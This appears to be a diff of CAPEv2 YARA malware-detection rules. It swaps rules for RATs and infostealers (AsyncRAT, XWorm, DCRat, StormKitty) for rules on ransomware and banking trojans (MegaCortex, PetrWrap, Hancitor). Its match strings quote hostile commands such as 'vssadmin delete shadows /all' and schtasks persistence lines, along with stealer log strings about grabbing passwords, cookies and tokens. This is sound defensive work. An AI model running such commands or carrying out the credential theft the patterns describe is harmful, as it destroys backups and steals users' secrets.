-		$conf_1 = {48 01 ?? 48 8D 15 [4] 41 B8 ?? 04 00 00 E8 [4] [0-5] C7 [1-2] 00 00 00 00}
-		$confkey_1 = {48 8D 15 [4] 48 89 ?? 49 89 ?? E8 [4] [0-5] C7 [1-2] 00 00 00 00}
-		$confkey_2 = {48 01 ?? 48 8D 15 [4] 41 B8 10 00 00 00 E8 [4] [0-5] C7 [1-2] 00 00 00 00 (48 8B|8B)}
-		$confkey_3 = {48 01 ?? 48 8D 15 [4] 41 B8 10 00 00 00 E8 [4] [0-5] C7 [1-2] 00 00 00 00 48 83 C4}
+		$crypto1 = {8A 07 8D 7F 01 0F B6 C0 B9 ?? 00 00 00 2B C8 6B C1 ?? 99 F7 FE 8D [2] 99 F7 FE 88 ?? FF 83 EB 01 75 DD}
+		$website1 = "https://contirecovery.info" ascii wide
+		$website2 = "https://contirecovery.best" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $conf_1 and 2 of ( $confkey_* )
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Zloader2025 : FILE
+rule CAPE_Rhadamanthys_1
 {
 	meta:
-		description = "Zloader Payload"
-		author = "enzok"
-		id = "dd6ee439-9599-564c-8841-94bd89ae2db0"
-		date = "2020-04-04"
-		modified = "2025-12-09"
+		description = "Rhadamanthys Payload"
+		author = "kevoreilly, YungBinary"
+		id = "cd34b971-3603-5237-b47f-aea78ca38cac"
+		date = "2023-01-25"
+		modified = "2025-12-19"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Zloader.yar#L36-L49"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "86ffd411b42d8d06bdb294f48e79393adeea586c56c5c75c1a68ce6315932881"
-		logic_hash = "cc9c39f0b5e7e8c8853982d9c896bbaac5a36bb0f501c8901d8854f2d5e1a19c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Rhadamanthys.yar#L1-L19"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "3ccfc97202690dd996ffd2b4f09d31e6ee322bf9f0b7759f9b8c455164995f84"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Zloader Payload"
+		tags = ""
+		cape_type = "Rhadamanthys Payload"
 
 	strings:
-		$conf = {4? 01 ?? [4] E8 [4] 4? 8D 15 [4] 4? 89 ?? 4? 89 ?? E8 [4] C7 46 30 00 00 00 00 8B 7E 34}
-		$confkey_1 = {4? 01 ?? [2] E8 [4] 4? 8D 15 [4] 4? 89 ?? 4? 89 ?? E8 [4] C7 46 34 00 00 00 00 8B 46 38}
-		$confkey_2 = {4? 01 ?? [2] E8 [4] 4? 8D 15 [4] 4? 89 ?? 4? 89 ?? E8 [4] C7 46 38 00 00 00 00 48 83 C4 28}
+		$rc4 = {88 4C 01 08 41 81 F9 00 01 00 00 7C F3 89 75 08 33 FF 8B 4D 08 3B 4D 10 72 04 83 65 08 00}
+		$code = {8B 4D FC 3B CF 8B C1 74 0D 83 78 04 02 74 1C 8B 40 1C 3B C7 75 F3 3B CF 8B C1 74 57 83 78 04 17 74 09 8B 40 1C 3B C7 75 F3 EB}
+		$conf_1 = {46 BB FF 00 00 00 23 F3 0F B6 44 31 08 03 F8 23 FB 0F B6 5C 39 08 88 5C 31 08 88 44 39 08 02 C3 8B 5D 08 0F B6 C0 8A 44 08 08}
+		$conf_2 = {0F B6 4F 2A 8D 77 2A 33 C0 6A 03 89 45 F8 89 45 FC 89 45 08 8B C1}
+		$beef = {57 8D 44 33 FC 53 83 C6 FC 50 56 E8 [4] 83 C4 10 66 81 3F EF BE 0F 85}
+		$anti = {50 68 [4] 68 [4] E8 [4] 83 C4 0C A3 [4] 85 C0 74}
+		$dnr = {99 52 50 8D 45 ?? 99 52 50 8B C7 99 52 50 8B C3 99 52 50}
+		$sys = {83 E4 F0 6A 33 E8 00 00 00 00 83 04 24 05 CB}
+		$cape_string = "cape_options"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $conf and all of ( $confkey_* )
+		2 of them and not $cape_string
 }
-
-rule CAPE_Netsupport : FILE
+rule CAPE_Rhadamanthysloader
 {
 	meta:
-		description = "Detects NetSupport Manager RAT on disk or in memory"
-		author = "YungBinary"
-		id = "c517193e-bee3-59c4-9fbf-aad01ee13379"
-		date = "2025-10-17"
-		modified = "2025-10-17"
+		description = "Rhadamanthys Loader"
+		author = "kevoreilly"
+		id = "0d9955e8-c6e5-50f0-8006-8f6157038d40"
+		date = "2023-01-25"
+		modified = "2025-12-19"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/NetSupport.yar#L3-L16"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "d12e46d74ae0ba9f599d27dc2f55ff92a6648accbcd1a43cc3f1a9a2755e5fc7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Rhadamanthys.yar#L21-L33"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "5505c9ba1f0c6cb9aa9c212bf8bc2c49ad544e99996a1f4c1fa79a27a14d4c7f"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "NetSupport Payload"
+		tags = ""
+		cape_type = "Rhadamanthys Loader"
 
 	strings:
-		$a1 = "NetSupport Manager" wide
-		$b1 = "NetSupport Remote Control" wide
-		$s1 = "Client Application" wide
-		$s2 = "NetSupport Ltd" wide
+		$ref = {33 D2 B9 0B 00 00 00 F7 F1 B8 01 00 00 00 6B C8 00 8D 84 0D [4] 0F BE 0C 10 8B 95 [4] 03 95 [4] 0F B6 02 33 C1 8B 8D [4] 03 8D [4] 88 01}
+		$ntdll = {B9 6E 00 00 00 66 89 8D [4] BA 74 00 00 00 66 89 95 [4] B8 64 00 00 00 66 89 85 [4] B9 6C 00 00 00 66 89 8D [4] BA 6C 00 00 00 66 89 95}
+		$exit = {6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 8B 95 [4] 52 8B 85 [4] 50 6A 00 68 FF FF 1F 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( pe.imports ( "PCICL32.dll" , "_NSMClient32@8" ) ) or ( ( $a1 and $b1 ) or ( $s1 and $s2 ) ) )
+		2 of them
 }
-rule CAPE_Asyncrat_Kingrat
+rule CAPE_Megacortex : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "jeFF0Falltrades"
-		id = "45efdcdf-b255-5913-97eb-f296d2c4eb1f"
-		date = "2024-10-09"
-		modified = "2025-02-03"
+		description = "MegaCortex Payload"
+		author = "kevoreilly"
+		id = "ea3dd937-2cb1-5b0f-98b8-154aacaf8650"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AsyncRAT.yar#L1-L30"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "1400d2029dfb66d8f2dc34db8643d6301f3af9bd356639f883d2c10bcc0c3947"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/MegaCortex.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "5de1d8241260070241c91b97f18feb2a90069e3b158e863e2d9f568799c244e6"
 		score = 75
-		quality = 33
-		tags = ""
-		cape_type = "AsyncRAT Payload"
+		quality = 70
+		tags = "FILE"
+		cape_type = "MegaCortex Payload"
 
 	strings:
-		$str_async = "AsyncClient" wide ascii nocase
-		$str_aes_exc = "masterKey can not be null or empty" wide ascii
-		$str_schtasks = "schtasks /create /f /sc onlogon /rl highest" wide ascii
-		$byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 }
-		$byte_aes_salt_base = { BF EB 1E 56 FB CD 97 3B B2 19 }
-		$patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
-		$patt_config = { 72 [3] 70 80 [3] 04 }
-		$dcrat_1 = "dcrat" wide ascii nocase
-		$dcrat_2 = "qwqdan" wide ascii
-		$dcrat_3 = "YW1zaS5kbGw=" wide ascii
-		$dcrat_4 = "VmlydHVhbFByb3RlY3Q=" wide ascii
-		$dcrat_5 = "save_Plugin" wide ascii
-		$ww2 = "WorldWindClient" wide fullword nocase
-		$ww3 = "WorldWindStealer" wide fullword nocase
-		$ww4 = "*WorldWind Pro - Results:*" wide fullword nocase
-		$ww5 = /WorldWind(\s)?Stealer/ ascii wide
-		$prynt = /Prynt(\s)?Stealer/ ascii wide
+		$str1 = ".megac0rtx" ascii wide
+		$str2 = "vssadmin delete shadows /all" ascii
+		$sha256 = {98 2F 8A 42 91 44 37 71 CF FB C0 B5 A5 DB B5 E9}
 
 	condition:
-		( not any of ( $dcrat* ) and not any of ( $ww* ) and not $prynt ) and 6 of them and #patt_config >= 10
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Stormkitty : FILE
+rule CAPE_Gootkit : FILE
 {
 	meta:
-		description = "StormKitty infostealer payload"
-		author = "ditekSHen"
-		id = "71239da9-064f-58c4-a6fa-eb4983a3f55e"
-		date = "2024-10-09"
-		modified = "2025-02-03"
+		description = "Gootkit Payload"
+		author = "kevoreilly"
+		id = "8935fd10-ac79-5196-80c2-fc8f2fe185b5"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AsyncRAT.yar#L32-L57"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "258f5d9da80ff912459194b1139f062491df21a44456942951e2bd98e4b86c9b"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Gootkit.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "26704b6b0adca51933fc9d5e097930320768fd0e9355dcefc725aee7775316e7"
 		score = 75
-		quality = 41
+		quality = 70
 		tags = "FILE"
-		cape_type = "StormKitty Payload"
+		cape_type = "Gootkit Payload"
 
 	strings:
-		$x1 = "\\ARTIKA\\Videos\\Chrome-Password-Recovery" ascii
-		$x2 = "https://github.com/LimerBoy/StormKitty" fullword ascii
-		$x3 = "StormKitty" fullword ascii
-		$s1 = "GetBSSID" fullword ascii
-		$s2 = "GetAntivirus" fullword ascii
-		$s3 = "C:\\Users\\Public\\credentials.txt" fullword wide
-		$s4 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" fullword wide
-		$s5 = "BCrypt.BCryptGetProperty() (get size) failed with status code:{0}" fullword wide
-		$s6 = "\"encrypted_key\":\"(.*?)\"" fullword wide
-		$ww2 = "WorldWindClient" wide fullword nocase
-		$ww3 = "WorldWindStealer" wide fullword nocase
-		$ww4 = "*WorldWind Pro - Results:*" wide fullword nocase
-		$ww5 = /WorldWind(\s)?Stealer/ ascii wide
-		$prynt = /Prynt(\s)?Stealer/ ascii wide
+		$code1 = {C7 45 ?? ?? ?? 4? 00 C7 45 ?? ?? 10 40 00 C7 45 E? D8 ?? ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 [1-2] 00 10 40 00 89 [5-6] 43 00 89 ?? ?? 68 E8 80 00 00 FF 15}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( not any of ( $ww* ) and not $prynt ) and ( 2 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Worldwind : FILE
+rule CAPE_Azorult : FILE
 {
 	meta:
-		description = "Detects WorldWind infostealer"
-		author = "ditekSHen"
-		id = "226f591a-dc06-54f5-96ae-d142f624ff71"
-		date = "2024-10-09"
-		modified = "2025-02-03"
+		description = "Azorult Payload"
+		author = "kevoreilly"
+		id = "ca76ec00-001f-56d0-bdbc-9dfd3239fba8"
+		date = "2019-10-30"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AsyncRAT.yar#L60-L82"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "9bb04fad460193cd877ea7f2de9337f69aadda01aee6c79f0a23cdf564b1e6c8"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Azorult.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "4691cf48d513d1965416b0cce1b6e19c8f7b393a940afd68b7c6ca8c0d125d90"
 		score = 75
-		quality = 45
+		quality = 70
 		tags = "FILE"
-		cape_type = "WorldWind Payload"
+		cape_type = "Azorult Payload"
 
 	strings:
-		$c1 = /WorldWind(\s)?Stealer/ ascii wide
-		$x2 = "@FlatLineStealer" ascii wide
-		$x3 = "@CashOutGangTalk" ascii wide
-		$m1 = ".Passwords.Targets." ascii
-		$m2 = ".Modules.Keylogger" ascii
-		$m3 = ".Modules.Clipper" ascii
-		$m4 = ".Modules.Implant" ascii
-		$s1 = "--- Clipper" wide
-		$s2 = "Downloading file: \"{file}\"" wide
-		$s3 = "/bot{0}/getUpdates?offset={1}" wide
-		$s4 = "send command to bot!" wide
-		$s5 = " *Keylogger " fullword wide
-		$s6 = "*Stealer" wide
-		$s7 = "Bot connected" wide
+		$code1 = {C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 00 00 00 8D 85 80 F5 FF FF 89 47 2C C7 47 30 00 08 00 00 8D 85 80 F1 FF FF 89 47 34 C7 47 38 00 04 00 00 57 68 00 00 00 90}
+		$string1 = "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\")"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $m* ) or 3 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Prynt : FILE
+rule CAPE_Cryptoshield : FILE
 {
 	meta:
-		description = "Detects Prynt infostealer"
-		author = "ditekSHen"
-		id = "844fd100-b04e-5ff0-9fab-d45f48b55bcc"
-		date = "2024-10-09"
-		modified = "2025-02-03"
+		description = "Cryptoshield Payload"
+		author = "kevoreilly"
+		id = "a7b60a0d-7d46-59c9-8273-ee23bae3fbbc"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AsyncRAT.yar#L85-L107"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "84f2b33285ab1d129a62940a02990639cc8f7c92d490d7257e6aed9170d1e34e"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Cryptoshield.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "46064b4c69cb1af01330c5d194ef50728e0f0479e9fbf72828822935f8e37ac6"
 		score = 75
-		quality = 45
+		quality = 70
 		tags = "FILE"
-		cape_type = "Prynt Payload"
+		cape_type = "Cryptoshield Payload"
 
 	strings:
-		$c1 = /Prynt(\s)?Stealer/ ascii wide
-		$x2 = "@FlatLineStealer" ascii wide
-		$x3 = "@CashOutGangTalk" ascii wide
-		$m1 = ".Passwords.Targets." ascii
-		$m2 = ".Modules.Keylogger" ascii
-		$m3 = ".Modules.Clipper" ascii
-		$m4 = ".Modules.Implant" ascii
-		$s1 = "--- Clipper" wide
-		$s2 = "Downloading file: \"{file}\"" wide
-		$s3 = "/bot{0}/getUpdates?offset={1}" wide
-		$s4 = "send command to bot!" wide
-		$s5 = " *Keylogger " fullword wide
-		$s6 = "*Stealer" wide
-		$s7 = "Bot connected" wide
+		$a1 = "CRYPTOSHIELD." wide
+		$a2 = "Click on Yes in the next window for restore work explorer" wide
+		$a3 = "r_sp@india.com - SUPPORT"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $m* ) or 3 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Xworm_1 : FILE
+rule CAPE_Buerloader_1 : FILE
 {
 	meta:
-		description = "Detects XWorm"
-		author = "ditekSHen"
-		id = "bf9115a7-850a-5326-860c-a9a71bc7e50c"
-		date = "2024-10-09"
-		modified = "2025-02-03"
+		description = "No description has been set in the source file - CAPE"
+		author = "kevoreilly & Rony (@r0ny_123)"
+		id = "95a9b4d7-db1e-50cd-bc08-01e4e4fd6dc4"
+		date = "2020-10-29"
+		modified = "2022-05-31"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AsyncRAT.yar#L110-L136"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "5a86c2f0a188135e53d86c176806a208abbe3dd830bde364016859ffa5294bd7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/BuerLoader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "05c1f008f0a2bb8232867977fb23a5ae8312f10f0637c6265561052596319c29"
 		score = 75
-		quality = 43
+		quality = 70
 		tags = "FILE"
-		cape_type = "XWorm Payload"
+		cape_type = "BuerLoader Payload"
 
 	strings:
-		$x1 = "XWorm " wide nocase
-		$x2 = /XWorm\s(V|v)\d+\.\d+/ fullword wide
-		$s1 = "RunBotKiller" fullword wide
-		$s2 = "XKlog.txt" fullword wide
-		$s3 = /(shell|reg)fuc/ fullword wide
-		$s4 = "closeshell" fullword ascii
-		$s5 = { 62 00 79 00 70 00 73 00 73 00 00 ?? 63 00 61 00 6c 00 6c 00 75 00 61 00 63 00 00 ?? 73 00 63 00 }
-		$s6 = { 44 00 44 00 6f 00 73 00 54 00 00 ?? 43 00 69 00 6c 00 70 00 70 00 65 00 72 00 00 ?? 50 00 45 00 }
-		$s7 = { 69 00 6e 00 6a 00 52 00 75 00 6e 00 00 ?? 73 00 74 00 61 00 72 00 74 00 75 00 73 00 62 }
-		$s8 = { 48 6f 73 74 00 50 6f 72 74 00 75 70 6c 6f 61 64 65 72 00 6e 61 6d 65 65 65 00 4b 45 59 00 53 50 4c 00 4d 75 74 65 78 78 00 }
-		$v2_1 = "PING!" fullword wide
-		$v2_2 = "Urlhide" fullword wide
-		$v2_3 = /PC(Restart|Shutdown)/ fullword wide
-		$v2_4 = /(Start|Stop)(DDos|Report)/ fullword wide
-		$v2_5 = /Offline(Get|Keylogger)/ wide
-		$v2_6 = "injRun" fullword wide
-		$v2_7 = "Xchat" fullword wide
-		$v2_8 = "UACFunc" fullword ascii wide
+		$trap = {0F 31 89 45 ?? 6A 00 8D 45 ?? 8B CB 50 E8 [4] 0F 31}
+		$decode = {8A 0E 84 C9 74 0E 8B D0 2A 0F 46 88 0A 42 8A 0E 84 C9 75 F4 5F 5E 5D C2 04 00}
+		$op = {33 C0 85 D2 7E 1? 3B C7 7D [0-15] 40 3B C2 7C ?? EB 02}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $v2* ) ) ) or 6 of them )
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Xworm_Kingrat
+rule CAPE_Hancitor : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "jeFF0Falltrades"
-		id = "76332a42-97c9-52fe-83dc-04ceb367f692"
-		date = "2024-10-09"
-		modified = "2025-02-03"
+		description = "Hancitor Payload"
+		author = "threathive"
+		id = "b4e9a26a-db00-5553-acc2-f35148b0ffd5"
+		date = "2019-10-30"
+		modified = "2020-10-20"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AsyncRAT.yar#L138-L155"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "3914be652bb7271e5e6b89d05edf10a54f8ddaf9e22d194b60501aa2cdd495d3"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Hancitor.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "84003542a2f587b5fbd43731c4240759806f8ee46df2bd96aae4a3c09d97e41c"
 		score = 75
-		quality = 66
-		tags = ""
-		cape_type = "XWorm payload"
+		quality = 70
+		tags = "FILE"
+		cape_type = "Hancitor Payload"
 
 	strings:
-		$str_xworm = "xworm" wide ascii nocase
-		$str_xwormmm = "Xwormmm" wide ascii
-		$str_xclient = "XClient" wide ascii
-		$str_default_log = "\\Log.tmp" wide ascii
-		$str_create_proc = "/create /f /RL HIGHEST /sc minute /mo 1 /t" wide ascii
-		$str_ddos_start = "StartDDos" wide ascii
-		$str_ddos_stop = "StopDDos" wide ascii
-		$str_timeout = "timeout 3 > NUL" wide ascii
-		$byte_md5_hash = { 7e [3] 04 28 [3] 06 6f }
-		$patt_config = { 72 [3] 70 80 [3] 04 }
+		$fmt_string = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)"
+		$fmt_string2 = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)"
+		$ipfy = "http://api.ipify.org"
+		$user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
 
 	condition:
-		5 of them and #patt_config >= 7
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Dcrat : FILE
+rule CAPE_Petrwrap : FILE
 {
 	meta:
-		description = "DCRat payload"
-		author = "ditekSHen"
-		id = "16c81fe0-2c18-55e9-aa17-cfd4213d6a17"
-		date = "2024-10-09"
-		modified = "2025-02-03"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AsyncRAT.yar#L157-L222"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "5a02dcc2b9c7eb3efdba39047e37886240b45fb7e2db3b82aa5b4b9526dfb7f8"
-		score = 75
-		quality = 20
-		tags = "FILE"
-		cape_type = "DCRat Payload"
-
-	strings:
-		$dc1 = "DCRatBuild" ascii
-		$dc2 = "DCStlr" ascii
-		$x1 = "px\"><center>DCRat Keylogger" wide
-		$x2 = "DCRat-Log#" wide
-		$x3 = "DCRat.Code" wide
-		$string1 = "CaptureBrowsers" fullword ascii
-		$string2 = "DecryptBrowsers" fullword ascii
-		$string3 = "Browsers.IE10" ascii
-		$string4 = "Browsers.Chromium" ascii
-		$string5 = "WshShell" ascii
-		$string6 = "SysMngmts" fullword ascii
-		$string7 = "LoggerData" fullword ascii
-		$plugin = "DCRatPlugin" fullword ascii
-		$av1 = "AntiVM" ascii wide
-		$av2 = "vmware" fullword wide
-		$av3 = "VirtualBox" fullword wide
-		$av4 = "microsoft corporation" fullword wide
-		$av5 = "VIRTUAL" fullword wide
-		$av6 = "DetectVirtualMachine" fullword ascii
-		$av7 = "Select * from Win32_ComputerSystem" fullword wide
-		$pl1 = "dcratAPI" fullword ascii
-		$pl2 = "dsockapi" fullword ascii
-		$pl3 = "file_get_contents" fullword ascii
-		$pl4 = "classthis" fullword ascii
-		$pl5 = "typemdt" fullword ascii
-		$pl6 = "Plugin_AutoStealer" ascii wide
-		$pl7 = "Plugin_AutoKeylogger" ascii wide
-		$v1 = "Plugin couldn't process this action!" wide
-		$v2 = "Unknown command!" wide
-		$v3 = "PLUGINCONFIGS" wide
-		$v4 = "Saving log..." wide
-		$v5 = "~Work.log" wide
-		$v6 = "MicrophoneNum" fullword wide
-		$v7 = "WebcamNum" fullword wide
-		$v8 = "%SystemDrive% - Slow" wide
-		$v9 = "%UsersFolder% - Fast" wide
-		$v10 = "%AppData% - Very Fast" wide
-		$v11 = /<span style=\"color: #F85C50;\">\[(Up|Down|Enter|ESC|CTRL|Shift|Win|Tab|CAPSLOCK: (ON|OFF))\]<\/span>/ wide
-		$px1 = "[Browsers] Scanned elements: " wide
-		$px2 = "[Browsers] Grabbing cookies" wide
-		$px3 = "[Browsers] Grabbing passwords" wide
-		$px4 = "[Browsers] Grabbing forms" wide
-		$px5 = "[Browsers] Grabbing CC" wide
-		$px6 = "[Browsers] Grabbing history" wide
-		$px7 = "[StealerPlugin] Invoke: " wide
-		$px8 = "[Other] Grabbing steam" wide
-		$px9 = "[Other] Grabbing telegram" wide
-		$px10 = "[Other] Grabbing discord tokens" wide
-		$px11 = "[Other] Grabbing filezilla" wide
-		$px12 = "[Other] Screenshots:" wide
-		$px13 = "[Other] Clipboard" wide
-		$px14 = "[Other] Saving system information" wide
+		description = "PetrWrap Payload"
+		author = "kevoreilly"
+		id = "83762c87-6e96-50fe-b297-e1a5f893be43"
+		date = "2019-10-30"
+		modified = "2022-06-09"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/PetrWrap.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "6dd1cf5639b63d0ab41b24080dad68d285f2e3969ad34fd724c83e7a0dd4b968"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		cape_type = "PetrWrap Payload"
+
+	strings:
+		$a1 = "http://petya3jxfp2f7g3i.onion/"
+		$a2 = "http://petya3sen7dyko2n.onion"
+		$b1 = "http://mischapuk6hyrn72.onion/"
+		$b2 = "http://mischa5xyix2mrhd.onion/"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $dc* ) or all of ( $string* ) or 2 of ( $x* ) or 6 of ( $v* ) or 5 of ( $px* ) ) or ( $plugin and ( 4 of ( $av* ) or 5 of ( $pl* ) ) )
+		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( any of ( $b* ) )
 }
-rule CAPE_Dcrat_Kingrat
+rule CAPE_Sedreco : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "jeFF0Falltrades"
-		id = "9b63e361-6678-5c95-be32-777feecd194b"
-		date = "2024-10-09"
-		modified = "2025-02-03"
+		description = "Sedreco encrypt function entry"
+		author = "kevoreilly"
+		id = "5b9ee4af-50a4-597c-8fa5-f2094c312d23"
+		date = "2019-10-30"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AsyncRAT.yar#L224-L243"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "73ac27c3f0fc71d053e89690b5a7d29c1f8b0ea0a22e8595148a9001799fae54"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Sedreco.yar#L1-L15"
